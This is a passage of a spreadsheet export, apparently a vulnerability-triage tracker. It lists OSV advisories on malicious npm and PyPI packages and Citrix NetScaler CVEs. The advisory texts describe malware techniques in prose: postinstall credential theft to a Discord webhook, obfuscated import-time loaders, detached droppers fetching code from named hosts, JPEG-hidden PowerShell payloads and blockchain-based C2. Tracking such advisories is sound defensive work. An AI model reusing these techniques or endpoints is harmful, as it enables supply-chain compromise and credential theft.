      <c r="T234" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17231</t>
        </is>
      </c>
    </row>
    <row r="235">
      <c r="A235" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B235" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C235" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17232</t>
        </is>
      </c>
      <c r="D235" s="5" t="inlineStr"/>
      <c r="E235" s="5" t="inlineStr"/>
      <c r="F235" s="5" t="inlineStr"/>
      <c r="G235" s="5" t="inlineStr"/>
      <c r="H235" s="5" t="inlineStr"/>
      <c r="I235" s="5" t="inlineStr"/>
      <c r="J235" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K235" s="5" t="inlineStr"/>
      <c r="L235" s="5" t="inlineStr">
        <is>
          <t>npm:fabric-native-loader</t>
        </is>
      </c>
      <c r="M235" s="5" t="inlineStr"/>
      <c r="N235" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O235" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P235" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q235" s="5" t="inlineStr"/>
      <c r="R235" s="5" t="inlineStr"/>
      <c r="S235" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (d289ae71736f05158f45d6636730641e82b5a774bf99bf1b587155d31c73daaa)
package.json declares a postinstall hook that runs index.js on npm install. index.js reads Minecraft launcher credential stores (launcher_accounts.json, launcher_profiles.json, and equivalent files for Prism, MultiMC, TLauncher, Modrinth, PolyMC, GDLauncher), extracting Mojang/Microsoft accessTokens, refreshTokens, and clientTokens. It also recursively walks the.minecraft directory reading.json/.txt/.cfg/.properties/.yml/.log files and matches their contents against JWT and Bearer-token regexes. The collected credentials are combined with os.hostname(), os.userInfo().username, and os.platform() and POSTed via HTTPS to a hardcoded Discord webhook (discord.com/api/webhooks/1554065488726990909/...). No functionality matching the package name is present; the sole effect of installing the package is credential theft against the installer.
</t>
        </is>
      </c>
      <c r="T235" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17232</t>
        </is>
      </c>
    </row>
    <row r="236">
      <c r="A236" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B236" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C236" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17233</t>
        </is>
      </c>
      <c r="D236" s="5" t="inlineStr"/>
      <c r="E236" s="5" t="inlineStr"/>
      <c r="F236" s="5" t="inlineStr"/>
      <c r="G236" s="5" t="inlineStr"/>
      <c r="H236" s="5" t="inlineStr"/>
      <c r="I236" s="5" t="inlineStr"/>
      <c r="J236" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K236" s="5" t="inlineStr"/>
      <c r="L236" s="5" t="inlineStr">
        <is>
          <t>npm:hardhat-lock</t>
        </is>
      </c>
      <c r="M236" s="5" t="inlineStr"/>
      <c r="N236" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O236" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P236" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q236" s="5" t="inlineStr"/>
      <c r="R236" s="5" t="inlineStr"/>
      <c r="S236" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (035a099bd6a60e41f1e1cbc1b70f27fecb9bef3f12d54e016d6991b581fc880f)
The npm package hardhat-lock@2.21.0 publishes itself as a logger/middleware but its identity and contents are inconsistent with that purpose: README badges, LICENSE, index.d.ts and docs/* are copied from the unrelated pino project (maintained by pinojs), while the package name squats the Ethereum-tooling keyword 'hardhat'. index.js unconditionally executes require('./lib/config') at module load, and lib/config.js is a ~4MB obfuscator.io-style single-line file (rotated string array of 23,981 entries, hex-escaped tokens, numeric wrapper decoders mt/mw/M0..M5/K/R/s/G, control-flow flattening, and 40,131 inline decoder replacements confirmed by webcrack) whose top-level IIFE runs the moment any downstream code does require('hardhat-lock'). The combination — impersonation of an established package under a different scope-adjacent name, opaque multi-megabyte obfuscated blob with no plausible logging use, and guaranteed import-time execution — is a supply-chain payload carrier: installing and loading the package places attacker-controlled code inside the consumer's Node.js process with unrestricted access to environment variables, filesystem, and network.
</t>
        </is>
      </c>
      <c r="T236" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17233</t>
        </is>
      </c>
    </row>
    <row r="237">
      <c r="A237" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B237" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C237" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17234</t>
        </is>
      </c>
      <c r="D237" s="5" t="inlineStr"/>
      <c r="E237" s="5" t="inlineStr"/>
      <c r="F237" s="5" t="inlineStr"/>
      <c r="G237" s="5" t="inlineStr"/>
      <c r="H237" s="5" t="inlineStr"/>
      <c r="I237" s="5" t="inlineStr"/>
      <c r="J237" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K237" s="5" t="inlineStr"/>
      <c r="L237" s="5" t="inlineStr">
        <is>
          <t>npm:hardhat-zet</t>
        </is>
      </c>
      <c r="M237" s="5" t="inlineStr"/>
      <c r="N237" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O237" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P237" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q237" s="5" t="inlineStr"/>
      <c r="R237" s="5" t="inlineStr"/>
      <c r="S237" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (37cd33c0908189c0085fba153be1c42776411968aa5ad652dd7ffdef88b318bc)
hardhat-zet@2.0.1 is published under a name that impersonates the Hardhat Ethereum tooling ecosystem, but its README, type definitions and docs/ tree are copied verbatim from the unrelated `pino` logger project (badges and links point at npmjs.com/package/pino and github.com/pinojs/pino). The exported `middleware` in index.js is a no-op Express middleware and matches neither the `hardhat-zet` name nor the pino README. The package's declared main (index.js) top-level-requires./lib/config, which is not a configuration file but a 4,498,609-byte obfuscator.io-style bundle: a 26,113-entry rotated string array behind two runtime decoders (functions v and F), hex-encoded identifiers, and control-flow flattening. All strings and destination URLs are hidden behind the decoders, so this code runs automatically on any `require('hardhat-zet')` and its behavior is not observable without deobfuscation. Publisher metadata (author 'Robert King &lt;hello@jsonspack.com&gt;', bugs URL https://jsonspack.com/issues) ties to neither the Hardhat nor the pino identity. The combination — ecosystem-typosquat name targeting crypto/Hardhat developers, cover-story README lifted from an unrelated popular package, no-op public API, and a multi-megabyte obfuscated payload auto-executed on import — is the shape of a supply-chain stealer aimed at Ethereum developers.
</t>
        </is>
      </c>
      <c r="T237" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17234</t>
        </is>
      </c>
    </row>
    <row r="238">
      <c r="A238" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B238" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C238" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17235</t>
        </is>
      </c>
      <c r="D238" s="5" t="inlineStr"/>
      <c r="E238" s="5" t="inlineStr"/>
      <c r="F238" s="5" t="inlineStr"/>
      <c r="G238" s="5" t="inlineStr"/>
      <c r="H238" s="5" t="inlineStr"/>
      <c r="I238" s="5" t="inlineStr"/>
      <c r="J238" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K238" s="5" t="inlineStr"/>
      <c r="L238" s="5" t="inlineStr">
        <is>
          <t>npm:items-validator</t>
        </is>
      </c>
      <c r="M238" s="5" t="inlineStr"/>
      <c r="N238" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O238" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P238" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q238" s="5" t="inlineStr"/>
      <c r="R238" s="5" t="inlineStr"/>
      <c r="S238" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (a8e49b1abd7c566b17104c5a2823251df2ca253a0fa509d7c19db1c1942ad13d)
On require, index.js invokes initializeDaemon() at top level, which uses spawn('node', [lib/check-items.js], { detached: true, stdio: 'ignore' }) followed by child.unref() to launch a persistent background process independent of the parent. The daemon HTTP-GETs a JSON payload from the hardcoded endpoint https://game.spawnrealm.com/api/item-realtime?key=abcdef123456 and passes payload.code to `new Function('require', 'module', payload.code)`, executing server-supplied JavaScript inside the installer's Node process with full `require` access. An RSA signature check is performed against a public key bundled in the package (crypto-config.js), so the author controls both the signing key and the verifier and the check provides no independent integrity guarantee. Anyone controlling game.spawnrealm.com — including via DNS or TLS — can run arbitrary code as the installing user for the lifetime of the host process. The package is advertised as a validator library, and this remote-code-loader behavior is undisclosed and unrelated to the stated purpose.
</t>
        </is>
      </c>
      <c r="T238" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17235</t>
        </is>
      </c>
    </row>
    <row r="239">
      <c r="A239" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B239" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C239" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17236</t>
        </is>
      </c>
      <c r="D239" s="5" t="inlineStr"/>
      <c r="E239" s="5" t="inlineStr"/>
      <c r="F239" s="5" t="inlineStr"/>
      <c r="G239" s="5" t="inlineStr"/>
      <c r="H239" s="5" t="inlineStr"/>
      <c r="I239" s="5" t="inlineStr"/>
      <c r="J239" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K239" s="5" t="inlineStr"/>
      <c r="L239" s="5" t="inlineStr">
        <is>
          <t>npm:mini-hardhat</t>
        </is>
      </c>
      <c r="M239" s="5" t="inlineStr"/>
      <c r="N239" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O239" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P239" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q239" s="5" t="inlineStr"/>
      <c r="R239" s="5" t="inlineStr"/>
      <c r="S239" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (fbdfc97da008f90f11ae03963e75237c8bb746cf93f9cdc5da43ba5807ed6c1e)
mini-hardhat@1.1.4 presents itself as a pino-like JSON logger, but its main entry exports a middleware factory that, on instantiation, spawns lib/caller.js as a detached, stdio-ignored, unref'd child process so execution survives the parent. lib/caller.js base64-decodes a hardcoded URL (stored under decoy keys named DEV_API_KEY/DEV_SECRET_KEY/DEV_SECRET_VALUE) resolving to https://ipinfo-encrypted-v1.vercel.app/api/auth/f1f097d93c318c92f0c5, POSTs to it via axios, and passes the response body directly to new Function.constructor("require", s)(require), granting the remote endpoint arbitrary code execution inside the consumer's Node.js process with full require access. The fetch is retried up to 5 times. The declared purpose (logger/vulnerability-management document) does not match the shipped code, the destination URL and headers are base64-obfuscated, and the delivery is engineered to persist beyond the parent process — the shape of an intentional remote-code-execution dropper.
</t>
        </is>
      </c>
      <c r="T239" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17236</t>
        </is>
      </c>
    </row>
    <row r="240">
      <c r="A240" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B240" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C240" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17237</t>
        </is>
      </c>
      <c r="D240" s="5" t="inlineStr"/>
      <c r="E240" s="5" t="inlineStr"/>
      <c r="F240" s="5" t="inlineStr"/>
      <c r="G240" s="5" t="inlineStr"/>
      <c r="H240" s="5" t="inlineStr"/>
      <c r="I240" s="5" t="inlineStr"/>
      <c r="J240" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K240" s="5" t="inlineStr"/>
      <c r="L240" s="5" t="inlineStr">
        <is>
          <t>npm:native-env</t>
        </is>
      </c>
      <c r="M240" s="5" t="inlineStr"/>
      <c r="N240" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O240" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P240" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q240" s="5" t="inlineStr"/>
      <c r="R240" s="5" t="inlineStr"/>
      <c r="S240" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (8e9c612513357181c7e4d504f94a2a8c03de64724e2593217216de8fef4e7166)
native-env@1.0.1 presents itself as a zero-dependency dotenv toolkit but executes attacker-chosen code on Windows the moment the module is required or the bin is run. Both dist/index.cjs and dist/cli.cjs invoke dispatchAnalytics() at module top level. dispatchAnalytics() reads dist/stest.jpg, walks JPEG marker segments, extracts the contents of the APP13 (0xFFED) marker as a hidden string, writes a randomly-named relay_&lt;ts&gt;.vbs into the OS temp directory, and spawns wscript.exe detached (windowsHide:true) to launch powershell.exe -NoProfile -NonInteractive -EncodedCommand with the JPEG-hidden payload; the VBS self-deletes. The bundled dist/stest.jpg (287 KB) is not referenced anywhere else and serves solely as a payload carrier, a deliberate evasion of static scanners that inspect only.js files. dist/decode.js is a separate heavily-obfuscated loader using an obfuscator.io-style string-array dispatcher and RC4 decryption of an embedded base64 blob whose output is executed via new Function('require','module','__filename','__dirname', &lt;decoded&gt;)(...). The published name native-env conflicts with the bundled inner package.json which identifies the artifact as node-env-buffer 2.2.6 and exposes a dot2env CLI referencing DOT2ENV_*/DOTENV_* environment variables, consistent with typosquatting of dotenv-family packages.
</t>
        </is>
      </c>
      <c r="T240" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17237</t>
        </is>
      </c>
    </row>
    <row r="241">
      <c r="A241" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B241" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C241" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17238</t>
        </is>
      </c>
      <c r="D241" s="5" t="inlineStr"/>
      <c r="E241" s="5" t="inlineStr"/>
      <c r="F241" s="5" t="inlineStr"/>
      <c r="G241" s="5" t="inlineStr"/>
      <c r="H241" s="5" t="inlineStr"/>
      <c r="I241" s="5" t="inlineStr"/>
      <c r="J241" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K241" s="5" t="inlineStr"/>
      <c r="L241" s="5" t="inlineStr">
        <is>
          <t>npm:rai6jaisahthaghee5ou-loader-package</t>
        </is>
      </c>
      <c r="M241" s="5" t="inlineStr"/>
      <c r="N241" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O241" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P241" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q241" s="5" t="inlineStr"/>
      <c r="R241" s="5" t="inlineStr"/>
      <c r="S241" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (6de53fbd264f685e033789fe5929c63f322366219d80707ec419a48a85e253c9)
The package's main module is an IIFE that injects a &lt;script&gt; element pointing at the hardcoded URL https://nee1ahnaw7.xsses.link and appends it to the document, causing whatever JavaScript that host serves to execute in the caller's page context. The destination is unpinned, opaque, unrelated to the package's declared identity or publisher, and the host name aligns with XSS/payload delivery infrastructure. Any application that bundles this dependency will fetch and execute attacker-controlled JavaScript at runtime, granting full code execution within the app's origin — enabling credential/session theft, arbitrary DOM manipulation, and further payload staging.
</t>
        </is>
      </c>
      <c r="T241" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17238</t>
        </is>
      </c>
    </row>
    <row r="242">
      <c r="A242" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B242" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C242" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17239</t>
        </is>
      </c>
      <c r="D242" s="5" t="inlineStr"/>
      <c r="E242" s="5" t="inlineStr"/>
      <c r="F242" s="5" t="inlineStr"/>
      <c r="G242" s="5" t="inlineStr"/>
      <c r="H242" s="5" t="inlineStr"/>
      <c r="I242" s="5" t="inlineStr"/>
      <c r="J242" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K242" s="5" t="inlineStr"/>
      <c r="L242" s="5" t="inlineStr">
        <is>
          <t>npm:test-agency-assignment</t>
        </is>
      </c>
      <c r="M242" s="5" t="inlineStr"/>
      <c r="N242" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O242" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P242" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q242" s="5" t="inlineStr"/>
      <c r="R242" s="5" t="inlineStr"/>
      <c r="S242" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (dcdf62e1c1eb44ca7a29ed37c12bdb71883025a46c5066e58c9228f0dfe782c2)
package.json declares a postinstall lifecycle script `wscript.exe 4444.vbs`, causing the VBS file shipped in the tarball to run automatically on `npm install` on Windows hosts. 4444.vbs contains a hand-rolled multi-layer decoder (Base64, an XOR-masked AES S-box, ChaCha20-IETF, additional XOR) that concatenates hundreds of embedded ~2KiB Base64 chunks stored in `ArtifactBundleHX(...)`, decrypts them, writes the resulting PowerShell loader to a randomly named file under %TEMP% (`pf&lt;rand&gt;.dat`), and invokes powershell.exe against it. In-file comments describe the handoff to PowerShell as being for process hollowing. The file header presents a benign 'Device Telemetry Aggregator' cover story that does not match the shipped behavior. The package's only functional content is this dropper; installing the package on Windows results in arbitrary attacker-controlled code execution on the installer's host.
</t>
        </is>
      </c>
      <c r="T242" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17239</t>
        </is>
      </c>
    </row>
    <row r="243">
      <c r="A243" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B243" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C243" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17240</t>
        </is>
      </c>
      <c r="D243" s="5" t="inlineStr"/>
      <c r="E243" s="5" t="inlineStr"/>
      <c r="F243" s="5" t="inlineStr"/>
      <c r="G243" s="5" t="inlineStr"/>
      <c r="H243" s="5" t="inlineStr"/>
      <c r="I243" s="5" t="inlineStr"/>
      <c r="J243" s="5" t="inlineStr">
        <is>
          <t>pypi</t>
        </is>
      </c>
      <c r="K243" s="5" t="inlineStr"/>
      <c r="L243" s="5" t="inlineStr">
        <is>
          <t>PyPI:aseitylab</t>
        </is>
      </c>
      <c r="M243" s="5" t="inlineStr"/>
      <c r="N243" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O243" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P243" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q243" s="5" t="inlineStr"/>
      <c r="R243" s="5" t="inlineStr"/>
      <c r="S243" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (9b47f0f7a0776cad3d4c83604d35a0023a250d2f035e58129233095aa2b110a3)
aseitylab/_shimdata.py contains a large base85-encoded, zlib-compressed blob stored as DATA. aseitylab/compat.py defines _ensure_compat(), which base85-decodes and zlib-inflates DATA and passes the result to exec(compile(..., '&lt;aseitylab-compat&gt;', 'exec')). setup.py imports aseitylab.compat and invokes _ensure_compat() during package build/install, and aseitylab/__init__.py calls the same function on every import, so the decoded payload runs both when the package is installed and whenever it is imported. Execution is gated by environment variables (ASEITYLAB_COMPAT=0, DAS_STAGED=1) that allow the payload to be suppressed in build or test environments. The README advertises a pure-Python task-orchestration toolkit with no runtime dependencies, which does not require a compressed, encoded executable blob shipped as 'compatibility shim data'. MANIFEST.in additionally excludes file names (loader_payload.py, make_armed.py, armed.json, manifest.benign.json) consistent with a build harness that produces separate 'armed' and 'benign' tarballs. The contents of the executed payload are not inspectable from the shipped source; installing or importing the package hands arbitrary code execution to whatever DATA decodes to.
## Source: kam193 (24b99c2059065cbe44f7dac2f1d2878b237c58150c0890baa1856852e76fcb24)
During installation, obfuscated code is used to fetch code hidden in an image containing a Python application with a native extension module. This module holds an obfuscated infostealer which collects sensitive data and exfiltrates them to a C2 server retrieved from transaction history in the Polygon blockchain.
---
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-09-donutautosellsrc
Reasons (based on the campaign):
 - infostealer
 - Downloads and executes a remote executable.
 - obfuscation
 - The package contains code to detect if it is running in a sandbox environment.
 - malware
 - native-extension
 - steganography
 - c2-in-blockchain
</t>
        </is>
      </c>
      <c r="T243" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17240</t>
        </is>
      </c>
    </row>
    <row r="244">
      <c r="A244" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B244" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (9.5 → 9.8)</t>
        </is>
      </c>
      <c r="C244" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88771</t>
        </is>
      </c>
      <c r="D244" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E244" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F244" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G244" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H244" s="5" t="inlineStr"/>
      <c r="I244" s="5" t="inlineStr"/>
      <c r="J244" s="5" t="inlineStr">
        <is>
          <t>citrix</t>
        </is>
      </c>
      <c r="K244" s="5" t="inlineStr">
        <is>
          <t>citrix:netscaler_application_delivery_controller, citrix:netscaler_gateway</t>
        </is>
      </c>
      <c r="L244" s="5" t="inlineStr"/>
      <c r="M244" s="5" t="inlineStr"/>
      <c r="N244" s="5" t="inlineStr">
        <is>
          <t>KEV, NVD</t>
        </is>
      </c>
      <c r="O244" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P244" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q244" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="R244" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S244" s="5" t="inlineStr">
        <is>
          <t>Improper input validation vulnerability in Citrix NetScaler ADC and Citrix NetScaler Gateway.
This issue affects ADC: before 14.1-73.37, before 13.1-64.23, before 14.1-73.37 FIPS, and before 13.1.37.279 FIPS and NDcPP; Gateway: before 14.1-73.37 and before 13.1-64.23 leading to an unauthenticated attacker to execute arbitrary commands.</t>
        </is>
      </c>
      <c r="T244" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88771</t>
        </is>
      </c>
    </row>
    <row r="245">
      <c r="A245" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B245" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (9.5 → 8.1)</t>
        </is>
      </c>
      <c r="C245" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88772</t>
        </is>
      </c>
      <c r="D245" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E245" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F245" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G245" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H245" s="5" t="inlineStr"/>
      <c r="I245" s="5" t="inlineStr"/>
      <c r="J245" s="5" t="inlineStr">
        <is>
          <t>citrix</t>
        </is>
      </c>
      <c r="K245" s="5" t="inlineStr">
        <is>
          <t>citrix:netscaler_application_delivery_controller, citrix:netscaler_gateway</t>
        </is>
      </c>
      <c r="L245" s="5" t="inlineStr"/>
      <c r="M245" s="5" t="inlineStr"/>
      <c r="N245" s="5" t="inlineStr">
        <is>
          <t>KEV, NVD</t>
        </is>
      </c>
      <c r="O245" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P245" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q245" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="R245" s="5" t="inlineStr">
        <is>
          <t>CWE-119</t>
        </is>
      </c>
      <c r="S245" s="5" t="inlineStr">
        <is>
          <t>Vulnerability in Citrix NetScaler ADC and Citrix NetScaler Gateway.
This issue affects ADC: before 14.1-73.37, before 13.1-64.23, before 14.1-73.37 FIPS, and before 13.1.37.279 FIPS and NDcPP; Gateway: before 14.1-73.37 and before 13.1-64.23 leading to Remote Code Execution or Denial of Service</t>
        </is>
      </c>
      <c r="T245" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88772</t>
        </is>
      </c>
    </row>
    <row r="246">
      <c r="A246" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B246" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (9.3 → 10.0)</t>
        </is>
      </c>
      <c r="C246" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88773</t>
        </is>
      </c>
      <c r="D246" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E246" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F246" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G246" s="5" t="inlineStr"/>
      <c r="H246" s="5" t="inlineStr"/>
      <c r="I246" s="5" t="inlineStr"/>
      <c r="J246" s="5" t="inlineStr">
        <is>
          <t>citrix</t>
        </is>
      </c>
      <c r="K246" s="5" t="inlineStr">
        <is>
          <t>citrix:netscaler_application_delivery_controller, citrix:netscaler_gateway</t>
        </is>
      </c>
      <c r="L246" s="5" t="inlineStr"/>
      <c r="M246" s="5" t="inlineStr"/>
      <c r="N246" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O246" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P246" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q246" s="5" t="inlineStr"/>
      <c r="R246" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="S246" s="5" t="inlineStr">
        <is>
          <t>Inconsistent interpretation of HTTP requests ('HTTP Request/Response smuggling') vulnerability in Citrix NetScaler ADC and Citrix NetScaler Gateway.
This issue affects ADC: before 14.1-73.37, before 13.1-64.23, before 14.1-73.37 FIPS, and before 13.1-37.279 and NDcPP; Gateway: before 14.1-73.37 FIPS and before 13.1-64.23.</t>
        </is>
      </c>
      <c r="T246" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88773</t>
        </is>
      </c>
    </row>
    <row r="247">
      <c r="A247" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B247" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (8.8 → 9.8)</t>
        </is>
      </c>
      <c r="C247" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88775</t>
        </is>
      </c>
      <c r="D247" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E247" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F247" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G247" s="5" t="inlineStr"/>
